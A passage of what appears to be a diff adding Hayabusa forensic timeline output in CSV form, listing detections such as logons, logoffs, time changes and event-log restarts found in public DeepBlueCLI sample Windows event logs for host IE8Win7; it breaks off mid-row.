+2013-10-24 04:46:01.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 
04:46:10.368 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:47:07.743 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:47:07.743 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x19489,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x19489 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x194bb | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:54:00.258 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x194bb,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:54:08.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 
04:54:58.140 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:55:00.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:55:02.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:55:06.370 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:55:29.463 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:55:29.463 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x19153,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x19153 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x1917f | 
(Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:49:57.323 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1917f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:52:14.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:54:11.078 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:54:22.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:54:23.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 05:54:29.619 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:55:00.775 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:55:00.775 
+09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x2b15e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b15e | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b18a | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:56:36.649 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:05:37.180 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x2b18a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:06:17.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 06:07:31.859 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:07:33.000 +09:00,IE8Win7,6005,info,,Event Log Service 
Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:07:35.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:07:44.487 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:13:38.283 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:13:38.283 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x25519,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x25519 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2553c | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:35:27.028 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time 
Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:50:27.138 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process: | Target Server: cifs/rdavis-7.sharplogic.local,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:45.841 +09:00,IE8Win7,4624,info,,Logon Type 4 - Batch,User: IEUser | Computer: IE8WIN7 | IP Addr: - | LID: 0x15f454,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:45.841 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:45.841 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x15f454,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:45.919 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0x15f454,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.263 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\lsass.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.263 +09:00,IE8Win7,4672,info,,Admin 
Logon,User: IEUser | LID: 0x15f53a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0x15f546,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0x15f53a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:54:01.732 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x2553c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:54:10.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:55:25.000 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:29.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:55:32.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:55:35.625 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: 
localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:35.625 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0xdad4,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xdad4 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xdafc | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:37.450 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:44.840 +09:00,IE8Win7,4624,info,,Logon Type 4 - Batch,User: IEUser | Computer: IE8WIN7 | IP Addr: - | LID: 0x13dbc,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:44.840 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:44.840 +09:00,IE8Win7,4672,info,,Admin 
Logon,User: IEUser | LID: 0x13dbc,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:00:55.356 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0xdafc,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0xdafc,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0xdad4,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:01:28.840 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:01:28.840 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x4bafc,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x4bafc | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x4bb14 | (Warning: Credentials are stored in 
memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:04:16.809 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x4bb14,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:04:18.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 07:05:21.859 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:25.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 07:05:31.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 07:05:32.609 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:32.609 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0xd99e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: 
IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xd99e | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xd9c6 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:36.944 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:40.928 +09:00,IE8Win7,4624,info,,Logon Type 4 - Batch,User: IEUser | Computer: IE8WIN7 | IP Addr: - | LID: 0x144df,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:40.928 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:40.928 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x144df,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 08:11:15.779 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:29:47.424 
+09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:32:12.657 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0x144df,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:34:00.063 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process: | Target Server: HYPERV.sharplogic.local,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:40:48.532 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0xd9c6,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:41:16.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:42:34.625 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:42:37.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:42:43.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-22 08:42:49.610 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System 
Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:43:06.625 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:43:06.625 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x16559,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x16559 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x16589 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:44:23.849 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 09:44:32.677 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x16589,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 10:43:32.000 +09:00,IE8Win7,6006,info,,Event Log Service 
Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:07:26.562 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:07:37.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:07:38.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-24 14:07:42.189 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:08:08.126 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:08:08.126 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 